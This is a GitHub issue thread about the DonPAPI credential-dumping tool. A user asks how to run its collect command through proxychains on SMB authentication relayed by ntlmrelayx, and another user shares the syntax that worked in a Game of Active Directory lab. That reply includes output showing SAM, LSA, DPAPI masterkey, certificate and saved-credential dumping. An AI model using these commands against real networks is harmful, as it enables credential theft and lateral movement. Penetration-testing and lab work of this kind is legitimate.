Support for Proxied SMB Authentication Connections #76

Open
mr-pmillz opened this issue Aug 8, 2024 · 2 comments

Comments

@mr-pmillz

Prior to version 2.0, it was possible to proxy SMB relayed auth from ntlmrelayx.py to donpapi via the following syntax:

proxychains4 donpapi -o . -dc-ip <DCIP> -no-pass NETBIOSDOMAIN/[email protected]

^ This works properly as intended.

In the latest version since the 2.0 release, I haven't been able to figure out how to get this to work. I've tried syntax such as, but not limited to:

proxychains4 donpapi collect -d example.com --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect -d NETBIOSDOMAIN --dc-ip <DCIP> --no-pass -u USERNAME -t 10.10.10.10

Is there a way in the latest version of donpapi for the collect sub-command to support proxied authentication?

@vinsroman

Hey @mr-pmillz,
I am practicing Game of Active Directory and was able to get it to run as
proxychains donpapi collect -t 'TARGETIP' -u 'USERNAME' -d 'NETBIOSDOMAIN' --no-pass
however, even though the output shows the following

[192.168.56.22] [+] Starting gathering credz
[192.168.56.22] [+] Dumping SAM
[192.168.56.22] [$] [SAM] Got 5 accounts
[192.168.56.22] [+] Dumping LSA
[192.168.56.22] [$] [LSA] (Unknown User):xxxXXXXxxxxXXXXX
[192.168.56.22] [+] Dumping User and Machine masterkeys
[192.168.56.22] [$] [DPAPI] Got 7 masterkeys
[192.168.56.22] [+] Dumping User Chromium Browsers
[192.168.56.22] [+] Dumping User and Machine Certificates
[192.168.56.22] [$] [Certificates] [SYSTEM] - VAGRANT - VAGRANT_3B1B828383EEA854.pfx
[192.168.56.22] [$] [Certificates] [SYSTEM] - SAN not found - SAN not found_B427A2FC1D1C57FC.pfx
[192.168.56.22] [+] Dumping User and Machine Credential Manager
[192.168.56.22] [+] Gathering recent files and desktop files
[192.168.56.22] [+] Dumping User Firefox Browser
[192.168.56.22] [+] Dumping MobaXterm credentials
[192.168.56.22] [+] Dumping MRemoteNg Passwords
[192.168.56.22] [+] Dumping User's RDCManager
[192.168.56.22] [+] Dumping SCCM Credentials

I see only one secret and 2 certs in the donpapi web GUI and should get more afaik.

@mr-pmillz
Author

Ah interesting. Does it work with the DC IP and domain flags? Or does it only work when those flags are not specified when using proxied auth? @vinsroman
